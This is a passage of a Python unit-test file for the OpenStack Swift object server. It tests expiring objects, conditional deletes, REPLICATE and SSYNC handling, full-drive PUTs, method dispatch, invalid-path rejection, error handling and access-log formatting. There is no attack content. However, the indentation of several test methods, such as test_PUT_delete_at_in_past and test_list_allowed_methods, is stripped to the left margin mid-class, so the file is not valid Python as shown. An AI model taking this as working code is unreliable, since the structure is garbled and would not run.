            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 1000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        orig_time = object_server.time.time
        try:
            # advance server time beyond the expiry: POST now 404s
            t = time() + 2
            object_server.time.time = lambda: t
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'POST'},
                headers={'X-Timestamp': normalize_timestamp(time())})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
        finally:
            object_server.time.time = orig_time
    def test_DELETE_but_expired(self):
        """DELETE of an already-expired object returns 404."""
        test_time = time() + 10000
        delete_at_timestamp = int(test_time + 100)
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        orig_time = object_server.time.time
        try:
            # move the server clock past the object's delete-at time
            t = test_time + 100
            object_server.time.time = lambda: float(t)
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'DELETE'},
                headers={'X-Timestamp': normalize_timestamp(time())})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
        finally:
            object_server.time.time = orig_time
    def test_DELETE_if_delete_at_expired_still_deletes(self):
        """An expirer DELETE with a matching X-If-Delete-At still reaps the
        on-disk .data file even after the object has expired."""
        test_time = time() + 10
        test_timestamp = normalize_timestamp(test_time)
        delete_at_time = int(test_time + 10)
        delete_at_timestamp = str(delete_at_time)
        delete_at_container = str(
            delete_at_time /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': test_timestamp,
                     'X-Delete-At': delete_at_timestamp,
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # sanity: object is readable before expiry
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
            headers={'X-Timestamp': test_timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(resp.body, 'TEST')
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(test_timestamp).internal + '.data')
        self.assertTrue(os.path.isfile(objfile))
        # move time past expiry
        with mock.patch('swift.obj.diskfile.time') as mock_time:
            mock_time.time.return_value = test_time + 100
            req = Request.blank(
                '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
                headers={'X-Timestamp': test_timestamp})
            resp = req.get_response(self.object_controller)
            # request will 404
            self.assertEqual(resp.status_int, 404)
            # but file still exists
            self.assertTrue(os.path.isfile(objfile))
            # make the x-if-delete-at with some wrong bits -> 412, no reap
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'DELETE'},
                headers={'X-Timestamp': delete_at_timestamp,
                         'X-If-Delete-At': int(time() + 1)})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 412)
            self.assertTrue(os.path.isfile(objfile))
            # make the x-if-delete-at with all the right bits -> 204, reaped
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'DELETE'},
                headers={'X-Timestamp': delete_at_timestamp,
                         'X-If-Delete-At': delete_at_timestamp})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 204)
            self.assertFalse(os.path.isfile(objfile))
            # make the x-if-delete-at with all the right bits (again) -> 412
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'DELETE'},
                headers={'X-Timestamp': delete_at_timestamp,
                         'X-If-Delete-At': delete_at_timestamp})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 412)
            self.assertFalse(os.path.isfile(objfile))
            # make the x-if-delete-at for some object never PUT -> 404
            req = Request.blank(
                '/sda1/p/a/c/o-not-found',
                environ={'REQUEST_METHOD': 'DELETE'},
                headers={'X-Timestamp': delete_at_timestamp,
                         'X-If-Delete-At': delete_at_timestamp})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
    def test_DELETE_if_delete_at(self):
        """X-If-Delete-At must match the stored X-Delete-At (412 on
        mismatch, 400 when it is not an integer)."""
        test_time = time() + 10000
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 99),
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 98)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        delete_at_timestamp = int(test_time - 1)
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 97),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # X-If-Delete-At that doesn't match the stored value -> 412
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 95),
                     'X-If-Delete-At': str(int(test_time))})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        # plain DELETE without the conditional header still works
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 95)})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        delete_at_timestamp = int(test_time - 1)
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 94),
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 92),
                     'X-If-Delete-At': str(int(test_time))})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        # matching X-If-Delete-At -> 204
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 92),
                     'X-If-Delete-At': delete_at_timestamp})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        # non-integer X-If-Delete-At -> 400
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': normalize_timestamp(test_time - 92),
                     'X-If-Delete-At': 'abc'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 400)
    def test_DELETE_calls_delete_at(self):
        """PUT and DELETE both invoke delete_at_update with the stored
        X-Delete-At value and the expiring-objects account args."""
        given_args = []
        def fake_delete_at_update(*args):
            # capture the args delete_at_update was called with
            given_args.extend(args)
        self.object_controller.delete_at_update = fake_delete_at_update
        timestamp1 = normalize_timestamp(time())
        delete_at_timestamp1 = int(time() + 1000)
        delete_at_container1 = str(
            delete_at_timestamp1 /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp1,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'X-Delete-At': str(delete_at_timestamp1),
                     'X-Delete-At-Container': delete_at_container1})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # given_args[5] is compared to itself: the request object isn't
        # matched exactly, only the surrounding positional args are
        self.assertEqual(given_args, [
            'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
            given_args[5], 'sda1', POLICIES[0]])
        while given_args:
            given_args.pop()
        sleep(.00001)
        timestamp2 = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': timestamp2,
                     'Content-Type': 'application/octet-stream'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 204)
        # the DELETE reports the original delete-at time, not its own
        self.assertEqual(given_args, [
            'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
            given_args[5], 'sda1', POLICIES[0]])
def test_PUT_delete_at_in_past(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'X-Delete-At': str(int(time() - 1)),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('X-Delete-At in past' in resp.body)
def test_POST_delete_at_in_past(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time() + 1),
'X-Delete-At': str(int(time() - 1))})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('X-Delete-At in past' in resp.body)
    def test_REPLICATE_works(self):
        """REPLICATE returns the pickled suffix-hashes dict produced by
        DiskFileManager._get_hashes."""
        def fake_get_hashes(*args, **kwargs):
            return 0, {1: 2}
        def my_tpool_execute(func, *args, **kwargs):
            # run the hashing inline instead of on eventlet's tpool
            return func(*args, **kwargs)
        was_get_hashes = diskfile.DiskFileManager._get_hashes
        was_tpool_exe = tpool.execute
        try:
            diskfile.DiskFileManager._get_hashes = fake_get_hashes
            tpool.execute = my_tpool_execute
            req = Request.blank('/sda1/p/suff',
                                environ={'REQUEST_METHOD': 'REPLICATE'},
                                headers={})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
            p_data = pickle.loads(resp.body)
            self.assertEqual(p_data, {1: 2})
        finally:
            # restore the monkeypatched module/class attributes
            tpool.execute = was_tpool_exe
            diskfile.DiskFileManager._get_hashes = was_get_hashes
    def test_REPLICATE_timeout(self):
        """A Timeout raised while hashing propagates out of REPLICATE."""
        def fake_get_hashes(*args, **kwargs):
            raise Timeout()
        def my_tpool_execute(func, *args, **kwargs):
            # run the hashing inline instead of on eventlet's tpool
            return func(*args, **kwargs)
        was_get_hashes = diskfile.DiskFileManager._get_hashes
        was_tpool_exe = tpool.execute
        try:
            diskfile.DiskFileManager._get_hashes = fake_get_hashes
            tpool.execute = my_tpool_execute
            req = Request.blank('/sda1/p/suff',
                                environ={'REQUEST_METHOD': 'REPLICATE'},
                                headers={})
            self.assertRaises(Timeout, self.object_controller.REPLICATE, req)
        finally:
            # restore the monkeypatched module/class attributes
            tpool.execute = was_tpool_exe
            diskfile.DiskFileManager._get_hashes = was_get_hashes
def test_REPLICATE_insufficient_storage(self):
conf = {'devices': self.testdir, 'mount_check': 'true'}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.object_controller.bytes_per_sync = 1
def fake_check_mount(*args, **kwargs):
return False
with mock.patch("swift.obj.diskfile.check_mount", fake_check_mount):
req = Request.blank('/sda1/p/suff',
environ={'REQUEST_METHOD': 'REPLICATE'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 507)
    def test_REPLICATE_reclaims_tombstones(self):
        """Rehashing via REPLICATE reaps tombstones older than reclaim_age
        and cleans up the empty hash directory."""
        conf = {'devices': self.testdir, 'mount_check': False,
                'reclaim_age': 100}
        self.object_controller = object_server.ObjectController(
            conf, logger=self.logger)
        for policy in self.iter_policies():
            # create a tombstone
            ts = next(self.ts)
            delete_request = Request.blank(
                '/sda1/0/a/c/o', method='DELETE',
                headers={
                    'x-backend-storage-policy-index': int(policy),
                    'x-timestamp': ts.internal,
                })
            resp = delete_request.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 404)
            objfile = self.df_mgr.get_diskfile('sda1', '0', 'a', 'c', 'o',
                                               policy=policy)
            tombstone_file = os.path.join(objfile._datadir,
                                          '%s.ts' % ts.internal)
            self.assertTrue(os.path.exists(tombstone_file))
            # REPLICATE will hash it
            req = Request.blank(
                '/sda1/0', method='REPLICATE',
                headers={
                    'x-backend-storage-policy-index': int(policy),
                })
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
            # py2: dict.keys() returns a list, so [0] works directly
            suffix = pickle.loads(resp.body).keys()[0]
            self.assertEqual(suffix, os.path.basename(
                os.path.dirname(objfile._datadir)))
            # tombstone still exists
            self.assertTrue(os.path.exists(tombstone_file))
            # after reclaim REPLICATE will rehash
            replicate_request = Request.blank(
                '/sda1/0/%s' % suffix, method='REPLICATE',
                headers={
                    'x-backend-storage-policy-index': int(policy),
                })
            the_future = time() + 200
            with mock.patch('swift.obj.diskfile.time.time') as mock_time:
                mock_time.return_value = the_future
                resp = replicate_request.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
            self.assertEqual({}, pickle.loads(resp.body))
            # and tombstone is reaped!
            self.assertFalse(os.path.exists(tombstone_file))
            # N.B. with a small reclaim age like this - if proxy clocks get far
            # enough out of whack ...
            with mock.patch('swift.obj.diskfile.time.time') as mock_time:
                mock_time.return_value = the_future
                resp = delete_request.get_response(self.object_controller)
                # we won't even create the tombstone
                self.assertFalse(os.path.exists(tombstone_file))
                # hashdir sticks around tho
                self.assertTrue(os.path.exists(objfile._datadir))
            # REPLICATE will clean it all up
            resp = replicate_request.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 200)
            self.assertEqual({}, pickle.loads(resp.body))
            self.assertFalse(os.path.exists(objfile._datadir))
def test_SSYNC_can_be_called(self):
req = Request.blank('/sda1/0',
environ={'REQUEST_METHOD': 'SSYNC'},
headers={})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
    def test_PUT_with_full_drive(self):
        """When fallocate raises ENOSPC the PUT 507s before ever reading
        the request body (Expect: 100-continue path)."""
        class IgnoredBody(object):
            # records whether the server ever tried to read the body
            def __init__(self):
                self.read_called = False
            def read(self, size=-1):
                if not self.read_called:
                    self.read_called = True
                    return 'VERIFY'
                return ''
        def fake_fallocate(fd, size):
            # simulate a full drive
            raise OSError(errno.ENOSPC, os.strerror(errno.ENOSPC))
        orig_fallocate = diskfile.fallocate
        try:
            diskfile.fallocate = fake_fallocate
            timestamp = normalize_timestamp(time())
            body_reader = IgnoredBody()
            req = Request.blank(
                '/sda1/p/a/c/o',
                environ={'REQUEST_METHOD': 'PUT',
                         'wsgi.input': body_reader},
                headers={'X-Timestamp': timestamp,
                         'Content-Length': '6',
                         'Content-Type': 'application/octet-stream',
                         'Expect': '100-continue'})
            resp = req.get_response(self.object_controller)
            self.assertEqual(resp.status_int, 507)
            self.assertFalse(body_reader.read_called)
        finally:
            diskfile.fallocate = orig_fallocate
    def test_global_conf_callback_does_nothing(self):
        """Without replication_concurrency configured, the callback still
        installs a replication semaphore with the default value of 4."""
        preloaded_app_conf = {}
        global_conf = {}
        object_server.global_conf_callback(preloaded_app_conf, global_conf)
        self.assertEqual(preloaded_app_conf, {})
        self.assertEqual(global_conf.keys(), ['replication_semaphore'])
        try:
            value = global_conf['replication_semaphore'][0].get_value()
        except NotImplementedError:
            # On some operating systems (at a minimum, OS X) it's not possible
            # to introspect the value of a semaphore
            raise SkipTest
        else:
            self.assertEqual(value, 4)
def test_global_conf_callback_replication_semaphore(self):
preloaded_app_conf = {'replication_concurrency': 123}
global_conf = {}
with mock.patch.object(
object_server.multiprocessing, 'BoundedSemaphore',
return_value='test1') as mocked_Semaphore:
object_server.global_conf_callback(preloaded_app_conf, global_conf)
self.assertEqual(preloaded_app_conf, {'replication_concurrency': 123})
self.assertEqual(global_conf, {'replication_semaphore': ['test1']})
mocked_Semaphore.assert_called_once_with(123)
def test_handling_of_replication_semaphore_config(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
objsrv = object_server.ObjectController(conf)
self.assertTrue(objsrv.replication_semaphore is None)
conf['replication_semaphore'] = ['sema']
objsrv = object_server.ObjectController(conf)
self.assertEqual(objsrv.replication_semaphore, 'sema')
def test_serv_reserv(self):
# Test replication_server flag was set from configuration file.
conf = {'devices': self.testdir, 'mount_check': 'false'}
self.assertEqual(
object_server.ObjectController(conf).replication_server, None)
for val in [True, '1', 'True', 'true']:
conf['replication_server'] = val
self.assertTrue(
object_server.ObjectController(conf).replication_server)
for val in [False, 0, '0', 'False', 'false', 'test_string']:
conf['replication_server'] = val
self.assertFalse(
object_server.ObjectController(conf).replication_server)
def test_list_allowed_methods(self):
# Test list of allowed_methods
obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST']
repl_methods = ['REPLICATE', 'SSYNC']
for method_name in obj_methods:
method = getattr(self.object_controller, method_name)
self.assertFalse(hasattr(method, 'replication'))
for method_name in repl_methods:
method = getattr(self.object_controller, method_name)
self.assertEqual(method.replication, True)
    def test_correct_allowed_method(self):
        # Test correct work for allowed method using
        # swift.obj.server.ObjectController.__call__
        """An allowed (non-replication) verb is dispatched to its handler
        and the handler's WSGI result is returned as-is."""
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.object_controller = object_server.app_factory(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false'})
        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)
        method = 'PUT'
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/o',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        method_res = mock.MagicMock()
        # the handler returns a callable WSGI response; calling it (with
        # env/start_response) yields method_res
        mock_method = public(lambda x:
                             mock.MagicMock(return_value=method_res))
        with mock.patch.object(self.object_controller, method,
                               new=mock_method):
            response = self.object_controller(env, start_response)
            self.assertEqual(response, method_res)
    def test_not_allowed_method(self):
        # Test correct work for NOT allowed method using
        # swift.obj.server.ObjectController.__call__
        """A replication-only verb is refused with 405 when
        replication_server is false, and the request is access-logged."""
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false'}, logger=self.logger)
        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)
        method = 'PUT'
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/o',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        answer = ['<html><h1>Method Not Allowed</h1><p>The method is not '
                  'allowed for this resource.</p></html>']
        # mark the PUT handler as a replication method so it is disallowed
        mock_method = replication(public(lambda x: mock.MagicMock()))
        with mock.patch.object(self.object_controller, method,
                               new=mock_method):
            mock_method.replication = True
            # pin time/gmtime/getpid so the access-log line is deterministic
            with mock.patch('time.gmtime',
                            mock.MagicMock(side_effect=[gmtime(10001.0)])):
                with mock.patch('time.time',
                                mock.MagicMock(side_effect=[10000.0,
                                                            10001.0])):
                    with mock.patch('os.getpid',
                                    mock.MagicMock(return_value=1234)):
                        response = self.object_controller.__call__(
                            env, start_response)
                        self.assertEqual(response, answer)
                        self.assertEqual(
                            self.logger.get_lines_for_level('info'),
                            ['None - - [01/Jan/1970:02:46:41 +0000] "PUT'
                             ' /sda1/p/a/c/o" 405 - "-" "-" "-" 1.0000 "-"'
                             ' 1234 -'])
    def test_call_incorrect_replication_method(self):
        """With replication_server=true, all non-replication verbs 405."""
        inbuf = StringIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'true'}, logger=FakeLogger())
        def start_response(*args):
            """Sends args to outbuf"""
            outbuf.writelines(args)
        obj_methods = ['DELETE', 'PUT', 'HEAD', 'GET', 'POST', 'OPTIONS']
        for method in obj_methods:
            env = {'REQUEST_METHOD': method,
                   'SCRIPT_NAME': '',
                   'PATH_INFO': '/sda1/p/a/c',
                   'SERVER_NAME': '127.0.0.1',
                   'SERVER_PORT': '8080',
                   'SERVER_PROTOCOL': 'HTTP/1.0',
                   'CONTENT_LENGTH': '0',
                   'wsgi.version': (1, 0),
                   'wsgi.url_scheme': 'http',
                   'wsgi.input': inbuf,
                   'wsgi.errors': errbuf,
                   'wsgi.multithread': False,
                   'wsgi.multiprocess': False,
                   'wsgi.run_once': False}
            self.object_controller(env, start_response)
            self.assertEqual(errbuf.getvalue(), '')
            # start_response was called with a 405 status line
            self.assertEqual(outbuf.getvalue()[:4], '405 ')
    def test_not_utf8_and_not_logging_requests(self):
        """A path with a NULL byte / invalid UTF-8 is rejected, and with
        log_requests=false nothing is access-logged."""
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false', 'log_requests': 'false'},
            logger=FakeLogger())
        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)
        method = 'PUT'
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/\x00%20/%',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        answer = ['Invalid UTF8 or contains NULL']
        mock_method = public(lambda x: mock.MagicMock())
        with mock.patch.object(self.object_controller, method,
                               new=mock_method):
            response = self.object_controller.__call__(env, start_response)
            self.assertEqual(response, answer)
            # NOTE(review): the controller above was built with its own
            # FakeLogger, so the fixture's self.logger is expected to have
            # collected no lines here
            self.assertEqual(self.logger.get_lines_for_level('info'), [])
    def test__call__returns_500(self):
        """An unexpected exception in a handler yields a traceback body and
        an ERROR log line, but no access log (log_requests=false)."""
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.logger = debug_logger('test')
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false', 'log_requests': 'false'},
            logger=self.logger)
        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)
        method = 'PUT'
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/o',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        @public
        def mock_put_method(*args, **kwargs):
            # handler that blows up unconditionally
            raise Exception()
        with mock.patch.object(self.object_controller, method,
                               new=mock_put_method):
            response = self.object_controller.__call__(env, start_response)
            self.assertTrue(response[0].startswith(
                'Traceback (most recent call last):'))
            self.assertEqual(self.logger.get_lines_for_level('error'), [
                'ERROR __call__ error with %(method)s %(path)s : ' % {
                    'method': 'PUT', 'path': '/sda1/p/a/c/o'},
            ])
            self.assertEqual(self.logger.get_lines_for_level('info'), [])
    def test_PUT_slow(self):
        """With slow=10 configured and 1s elapsed, the server sleeps the
        remaining 9 seconds before responding."""
        inbuf = WsgiBytesIO()
        errbuf = StringIO()
        outbuf = StringIO()
        self.object_controller = object_server.ObjectController(
            {'devices': self.testdir, 'mount_check': 'false',
             'replication_server': 'false', 'log_requests': 'false',
             'slow': '10'},
            logger=self.logger)
        def start_response(*args):
            # Sends args to outbuf
            outbuf.writelines(args)
        method = 'PUT'
        env = {'REQUEST_METHOD': method,
               'SCRIPT_NAME': '',
               'PATH_INFO': '/sda1/p/a/c/o',
               'SERVER_NAME': '127.0.0.1',
               'SERVER_PORT': '8080',
               'SERVER_PROTOCOL': 'HTTP/1.0',
               'CONTENT_LENGTH': '0',
               'wsgi.version': (1, 0),
               'wsgi.url_scheme': 'http',
               'wsgi.input': inbuf,
               'wsgi.errors': errbuf,
               'wsgi.multithread': False,
               'wsgi.multiprocess': False,
               'wsgi.run_once': False}
        mock_method = public(lambda x: mock.MagicMock())
        with mock.patch.object(self.object_controller, method,
                               new=mock_method):
            # request appears to take exactly one second (10000.0 -> 10001.0)
            with mock.patch('time.time',
                            mock.MagicMock(side_effect=[10000.0,
                                                        10001.0])):
                with mock.patch('swift.obj.server.sleep',
                                mock.MagicMock()) as ms:
                    self.object_controller.__call__(env, start_response)
                    # slow (10) minus elapsed (1) = 9 seconds of sleep
                    ms.assert_called_with(9)
                    self.assertEqual(self.logger.get_lines_for_level('info'),
                                     [])
    def test_log_line_format(self):
        """The access-log line has the expected common-log-style format,
        checked with time/gmtime/getpid pinned to fixed values."""
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
        self.object_controller.logger = self.logger
        with mock.patch(
                'time.gmtime', mock.MagicMock(side_effect=[gmtime(10001.0)])):
            with mock.patch(
                    'time.time',
                    mock.MagicMock(side_effect=[10000.0, 10001.0, 10002.0])):
                with mock.patch(
                        'os.getpid', mock.MagicMock(return_value=1234)):
                    req.get_response(self.object_controller)
        self.assertEqual(
            self.logger.get_lines_for_level('info'),
            ['1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD /sda1/p/a/c/o" '
             '404 - "-" "-" "-" 2.0000 "-" 1234 -'])
    @patch_policies([StoragePolicy(0, 'zero', True),
                     StoragePolicy(1, 'one', False)])
    def test_dynamic_datadir(self):
        """The on-disk data dir is chosen per storage policy: objects-1 for
        policy 1, plain objects/ when no policy index header is given."""
        # update router post patch
        self.object_controller._diskfile_router = diskfile.DiskFileRouter(
            self.conf, self.object_controller.logger)
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test',
                                     'Foo': 'fooheader',
                                     'Baz': 'bazheader',
                                     'X-Backend-Storage-Policy-Index': 1,
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-Two': 'Two'})
        req.body = 'VERIFY'
        object_dir = self.testdir + "/sda1/objects-1"
        self.assertFalse(os.path.isdir(object_dir))
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # the policy-1 data dir was created by the PUT
        self.assertTrue(os.path.isdir(object_dir))
        # make sure no idx in header uses policy 0 data_dir
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test',
                                     'Foo': 'fooheader',
                                     'Baz': 'bazheader',
                                     'X-Object-Meta-1': 'One',
                                     'X-Object-Meta-Two': 'Two'})
        req.body = 'VERIFY'
        object_dir = self.testdir + "/sda1/objects"
